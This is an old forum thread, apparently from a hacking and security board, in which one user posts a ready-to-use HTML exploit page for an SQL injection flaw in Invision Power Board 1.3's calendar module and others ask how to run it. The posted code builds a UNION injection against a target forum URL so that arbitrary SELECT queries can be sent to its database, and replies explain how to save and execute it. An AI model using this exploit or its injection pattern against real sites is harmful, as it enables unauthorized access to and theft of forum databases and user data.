GaLiaRePt
Jan 4 2004, 02:54 PM
--------------------IPBexploit.html--------------------
| CODE |
<html>
<head><title>
Invision Power Board Free 1.3 FINAL SQL Injection Problems
</title></head>
<body>
<table width="100%" border="0" cellspacing="1" cellpadding="1">
<tr>
<td width="15%" height="341" align="left" valign="top"><p><a href="http://www.governmentsecurity.org/forum/"><img src="../new_images/forums2.png" alt="hacking exploits security forum" width="189" height="102" border="0" /></a><br />
<a href="http://www.governmentsecurity.org/forum/"><img src="../new_images/hacking.png" alt="hacking" width="190" height="84" border="0" /></a><br/>
<a href="../compliance.php"><img src="../new_images/compliance_articles.png" alt="compliance articles" width="190" height="84" border="0" /></a><br/>
<a href="http://governmentsecurity.bitpipe.com/data/detail?id=1206033259_610&type=RES&psrc=TPP"><img src="../new_images/main_ad_1.png" alt="security white papers" width="190" height="84" border="0" /></a><br/>
<a href="../directory.php"><img src="../new_images/main_ad_2.png" alt="information security consultant" width="190" height="84" border="0" /></a></p>
</td>
<td width="85%" align="left" valign="top">
<form action='/index.php?act=calendar' method='post'
onsubmit="this.m.value='2 )) UNION
'+this.request.value+'#';this.action=this.url.value+this.action;">
<b>IPB directory URL :</b> <input type='text' size='45' name='url'
value='http://forum.target.com'><br><br>
<b>SQL SELECT REQUEST :</b> <input type='text' size='80' name='request'
value='SELECT * FROM ibf_calendar_events'><br><br>
<u>Attention :</u> The request result MUST have this structure :<br><br>
INT,INT,INT,INT,INT,STR,STR,STR,INT,INT,INT,INT,INT,INT,CHAR(2),INT,INT,
INT,INT,STR,STR<br><br>
<input type='hidden' name='y' value='2004'>
<input type='hidden' name='m'>
<input type='submit' value='Execute'>
</form>
<br><br><br>
<p align="right">A patch can be found on <a
href="http://www.phpsecure.info" target="_blank">phpSecure.info</a>.<br>
For more informations about this exploit :
<a href="http://www.security-corporation.com/advisories-025.html"
target="_blank">
Security-Corporation.com</a></p>
</body>
</html> |
--------------------IPBexploit.html--------------------
Source here
FiStEh
Jan 4 2004, 06:12 PM
Thanky muchly. but im not too sure as to the function of this.
heh isnt this the exact thing this board is running on? hopefully patched by now
Iced_Eagle
Feb 9 2004, 01:56 AM
FiStEh: copy and paste that code into like notepad and save it as a .html
I wish I could know SQL so I could test it.
nubela
Feb 9 2004, 02:01 AM
lol. hope this xploit doesn affects this forum.
anyway, can ya elaborate on the vulnerabilities?
and wad's the fucntion of the xploit?
Iced_Eagle
Feb 9 2004, 02:07 AM
*edit* A vulnerability has been discovered in the sources/calendar.php file
that allows unauthorized users to inject SQL commands.
*edit2* I think I compiled that wrong or something... cause whenever I input a webaddress and I hit execute it goes back to C:/index.php
help?
Steffan
Feb 9 2004, 08:44 AM
| QUOTE (Iced_Eagle @ Feb 9 2004, 02:07 AM) |
*edit2* I think I compiled that wrong or something... cause whenever I input a webaddress and I hit execute it goes back to C:/index.php
help? |
U compile it ??????????????
U mean U execute it ?!!! install a Board on U CPU and let it run against it
C'ya
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please
click here.
